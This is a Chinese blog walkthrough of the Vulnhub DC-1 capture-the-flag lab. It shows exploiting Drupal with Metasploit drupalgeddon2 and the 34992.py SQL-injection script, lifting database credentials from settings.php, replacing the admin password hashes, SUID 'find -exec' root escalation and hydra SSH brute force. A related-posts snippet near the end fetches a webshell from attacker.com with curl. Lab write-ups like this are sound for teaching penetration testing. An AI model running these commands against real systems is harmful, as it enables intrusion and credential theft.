DC-1靶场

已于 2024-03-21 21:06:00 修改
阅读量1k 收藏 13
点赞数 23
分类专栏: 漏洞复现 网络安全 DC靶机 文章标签: 靶场 网络安全 安全 web安全
于 2024-03-21 20:39:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29977871/article/details/136918274
版权

一.环境搭建

下载地址

http://www.five86.com/downloads/DC-1.zip

把桥接设置为nat模式,打开靶机的时候会提示几个错误,点击重试即可

启动靶机,如下图所示即可

二.开始打靶 

1.信息收集

arp-scan -l

扫描跟kali(攻击机) 同一网段开了哪些ip,也就是发现靶机ip

我的攻击机ip为192.168.111.128,靶机ip为192.168.111.129

用nmap扫一下靶机开放的端口

nmap 192.168.111.129 -p1-65535

 开放了22/80/111/60677

我们先访问一下80端口,看一下是什么

也可以用以下工具得知是drupal cms

whatweb -v 192.168.111.129

根据以上操作,我们可以搜集到如下信息

端口号22/80/111/60677

drupal cms 7

PHP 5.4.45

Apache 2.2.22

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical Hackers

一搜发现这么多漏洞,进msf搜一下drupal,直接百度也行,一般这种nday都有大佬发教程

 

 2.漏洞探测与利用

打开msf,搜索drupal

msfconsole

search drupal

 选择exploit/unix/webapp/drupal_drupalgeddon2

use exploit/unix/webapp/drupal_drupalgeddon2

查看需要配置的内容

show options

Current Setting是目前设置的内容

Required表示是否需要设置内容,yes为必须设置,no可以设置也可不设置

就上面来说RHOSTS需要set

set rhosts 192.168.111.129

run

进行运行

 3.getshell

得到shell,输入shell

shell

弄一个交互式的shell,用python起一个(必须靶机安装了python环境才行)

python -c 'import pty; pty.spawn("/bin/bash")'

 

查看flag1.txt,发现提示,每个好的cms都需要一个配置文件,你也一样

4.数据库渗透

开始找配置文件

cat `find / -name settings.php`

我们获取到了他的数据库账号密码和flag2

 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
暴力破解和目录攻击不是唯一获取权限的方法(你需要权限),你能用这些凭证做些什么呢

使用配置文件中的数据库账号密码进行登录 

查看有哪些库

show databases;

使用drupaldb库并且查看表

use drupaldb;show tables;

下面有一个users表,进入这个表进行查看

select * from users;
select * from users\G;

 也可以使用下面这条命令,/G 的作用是将查到的结构旋转90度变成纵向(我没试)

获得两个用户

admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |

Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |  

 看这么复杂,而且在配置文件中找到slat也很长,撞库基本上不可能实现,所以用替换密码的方式获得用户登录权限,将一个已知的密码通过cms的算法加密后生成的hash,替换掉已存在用户的密码hash,就算是修改密码了

忘记Drupal的管理员密码的解决办法

方法一:可以新注册一个用户,密码记住了,然后通过phpmyadmin这样的可视化mysql管理工具到users表里把加密后的密码拷到admin的密码里。

方法二:这是drupal提供的最原生的方法

在windows下,打开命令行客户端(cmd),切换到Drupal7项目所在的目录,敲入以下命令:

php scripts/password-hash.sh admin

输出:

password: admin                 hash: $S$DMtruNEVmqWoqhlPwTlnFzwyBRFgQwXUfppe9pW1RqqXlMy97tzA

然后到数据库中,查users表,找到对应的用户名,修改密码,将上述的hash值复制到密码字段,保存即可。

 durpal的加密脚本存在此地址

/var/www/scripts/password-hash.sh

先退出mysql界面

exit;

 打开加密脚本,查看里面的内容

cat /var/www/scripts/password-hash.sh

 脚本是php代码,要求我们输入一个密码,它会返回一个加密后的hash

用php运行这个脚本,输出123456的hash 

php /var/www/scripts/password-hash.sh 123456

password: 123456 		hash: $S$D6lKdUrtIIj7LMx0NlWfLPBXhPSQU4VoKdw84FPYSR84FLj9XgRu

登录到mysql后,将这个hash替换到admin账户的密码

mysql -udbuser -pR0ck3t
 
use drupaldb;update users set pass = "$S$D6lKdUrtIIj7LMx0NlWfLPBXhPSQU4VoKdw84FPYSR84FLj9XgRu" where name = 'admin' or name = 'Fred';

 

 进入界面,输入账号密码admin/123456

点击这个content,会有一个flag3 

点击这个flag3,会给你提示 

 特殊权限会帮助你找到密码,但是你需要-exec(执行)命令去确定如何获得这个shadow(菜鸡翻译,敬请见谅)

 根据提示,我们输出一下passwd的内容

cat /etc/passwd

我们可以看到有一个flag4在这

切换到flag4的/home/flag4目录 ,查看有什么文件

cd /home/flag4
ls

你能用同样的方法去找到或者访问在root的flag吗

大概。 但是也许这并不容易。 也许是?

5.提权

现在要开始提升权限了

利用suid提权,查看默认以root权限执行的程序

find / -perm -u=s -type f 2>/dev/null

看到有find,直接用find提权

find / -exec "/bin/bash" -p \;
cd /root
ls

 

获取到root权限后,直接cd 到/root目录,看到最终的flag

cat thefinalflag.txt

 

 这个靶机还是非常简单的,按照其他大佬的wp打下来十分顺畅

三.其他方法

为什么这么写,是因为我想有个流畅的打靶体验,先通关再说

1.在数据库渗透的过程中,通过sql注入漏洞创建用户

drupal7版本在有个SQL注入的漏洞,可以添加一个admin权限的用户,适用版本7.31以下,我们可以在msf找一下这个工具

searchsploit drupal

 

searchsploit 34992.py -p

 

python2 /usr/share/exploitdb/exploits/php/webapps/34992.py

 这个软件给出了usage,可以进行尝试

python2 /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.111.129 -u test -p 123456

进入界面用test/123456进行登录,登录成功 

2.在查看flag4的时候可以不用提权,爆破flag4用户的ssh密码

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt ssh://192.168.111.129

 爆破到flag4的ssh密码为orange,进行连接,查看文件

mlws1900
关注
  • 23
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DC靶场系列--DC1
BGiscool的博客
06-28 4758
DC靶场,主要是通过web渗透技术,拿到web服务器的权限,会有flag做为标记,以拿到最终的flag为目标。DC1是vulnhub平台下的DC系列的第一个靶场,接下来我将会出DC系列的教程,有做的不对或者不完善之处,还请各位小伙伴们不吝指导。 ...
DC-1靶场实战详解
热门推荐
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
DC-1渗透靶场实战速通版
saber的博客
12-01 807
开启 Kali 和 DC靶机,确保二者互相可以ping通,Kali地址根据命令可以查找到,但是DC靶机我们是没有画面的,只是开启了一个环境,我们可以在虚拟机的设置里面找到。得出新的admin的密码后,又开始重复步骤,登录数据库,使用数据库语句修改指定表指定字段中的值,修改密码为我们123456加密后的值。回到终端,退出数据库,使用命令查看提示文件。
DC1靶场 Drupal
m0_62438849的博客
03-02 1079
22端口是开放的,试试ssh登录呢, ssh 客户端用户名@服务器ip地址,我本来想以刚才的admin和1111111试试能否登录,不能登录。find / -perm -4000 2>/dev/null寻找 4000权限的文件,不显示其他的错误信息相当于过滤。点击Dashboard,看到flag3,特殊的访问权限将能帮助找到密码,需要执行命令行,在/etc/shadow。内容格式:x表示此用户设有密码,但不是真正的密码,真正的密码保存在 /etc/shadow 文件中。
Vulnhub系列之DC1靶场详解
weixin_54960572的博客
08-09 294
提示-exec,linux中的 exec命令,-exec 后面跟的是linux的 command 命令,exec命令以分号结束;目录是用于存储用户密码信息的文件目录,也被称为“影子文件”。该目录只有root用户拥有读权限,其他用户不能直接查看或修改该目录下的文件。因此,这个命令的作用是在Linux系统的根目录下找到所有文件,并以管理员权限在每个文件上执行Bash shell。若不指定,则修改表中所有的行。尝试验证后发现编号为1的exp可以利用,选择进入。提示shadow,在Linux系统中
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
靶场系列之DC-1.md
07-26
靶场系列之DC-1.md
vuInhub靶场实战系列-DC-9实战
最新发布
06-02
vuInhub靶场实战系列-DC-9实战
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-1实战流程图
05-17
靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1149
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2663
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解
qq_58091216的博客
09-25 807
13. 我们切换语句进入shell,执行whoami查看当前权限,执行ls查看当前目录下文件,切换到root目录,查看文件,发现cat thefinalflag.txt文件。15. 此时我们查看 /etc/passwd 文件,发现存在 flag4 用户,我们也可以使用 hydra 进行爆破。2) 查看数据库,切换到drupaldb数据库,查看查找默认的Drupal user 表,发现admin信息。5. 虚拟机开启之后需要登录,我们不知道密码,需要探活ip地址,网段知道:192.168.52.0/24。
《Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2191
DC系列目前总共有9个靶机,本次靶机是DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
靶机DC-1 WP
m0_66638011的博客
05-11 1301
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
DC1-靶机详解
TonyChaoWei的博客
02-06 1639
DC系列靶机渗透实战 提权
靶场DC-1
sunxueer的博客
07-26 622
DC-1靶机环境:1. 打开虚拟机2. 信息收集2.1 nmap扫描存活主机确定DC-1的ip地址2.2 利用namp扫描DC-1开放的端口2.3 访问80端口2.4 寻找Drupal版本信息(多种办法)2.5 寻找此版本Drupal的漏洞2.6 使用漏扫工具OpenVas3. 漏洞利用(CVE-2018-7600)3.1 寻找flag13.2 寻找flag23.3 寻找flag33.4 寻找flag43.5 寻找flag5补充:OpenVas中的CVE-2014-3704也可以做 环境: 靶机名称:DC-
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值